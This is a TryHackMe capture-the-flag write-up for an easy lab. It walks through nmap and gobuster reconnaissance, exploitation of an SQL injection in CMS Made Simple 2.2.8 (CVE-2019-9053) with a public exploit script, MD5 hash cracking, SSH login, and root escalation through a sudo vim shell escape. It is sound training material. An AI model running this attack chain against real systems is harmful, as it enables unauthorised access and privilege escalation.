Platform: TryHackMe | Difficulty: Easy | CVE: CVE-2019-9053
nmap -p- --open <TARGET_IP>Results:
| Port | Service |
|---|---|
| 21 | FTP |
| 80 | HTTP |
| 2222 | SSH (non-default port) |
Confirm port 2222:
nmap -p 2222 -sS -sV -A <TARGET_IP>Output confirmed OpenSSH 7.2p2 on port 2222.
Visiting port 80 gave a default Apache page with nothing useful in the source.
Ran Gobuster to find hidden directories:
gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,htmlFound: /simple — a CMS Made Simple installation running version 2.2.8.
Searched for known exploits:
searchsploit CMS Made Simple 2.2.8Found CVE-2019-9053 — an unauthenticated time-based SQL injection affecting CMS Made Simple <= 2.2.9.
Grabbed the exploit:
searchsploit -m php/webapps/46635.pyThe original exploit was Python 2 and had print/encoding issues. Fixed and converted to Python 3.
Ran the fixed exploit against the /simple path:
python3 46635.py -u http://<TARGET_IP>/simpleExtracted:
| Field | Value |
|---|---|
| Salt | 1dac0d92e9fa6bb2 |
| Username | mitch |
| (found) | |
| Password hash | 0c01f4468bd75d7a84c7eb73846e8d96 |
Cracked the MD5 hash using CrackStation:
0c01f4468bd75d7a84c7eb73846e8d96 → secret
SSH is running on port 2222. Connected with the cracked credentials:
ssh mitch@<TARGET_IP> -p 2222User flag:
ls
cat user.txtChecked sudo permissions:
sudo -lOutput showed mitch can run vim as root with no password.
Used GTFOBins vim privesc to read the root flag directly:
sudo vim /root/root.txtOr to get a root shell:
sudo vim -c ':!/bin/bash'Root flag captured.
| Step | Detail |
|---|---|
| Open ports | 21 (FTP), 80 (HTTP), 2222 (SSH) |
| Web discovery | /simple → CMS Made Simple 2.2.8 |
| CVE | CVE-2019-9053 (SQLi) |
| Credentials | mitch : secret |
| Privesc vector | sudo vim → GTFOBins |
nmapgobustersearchsploit- Custom Python 3 exploit (CVE-2019-9053)
- CrackStation (MD5 lookup)
ssh- GTFOBins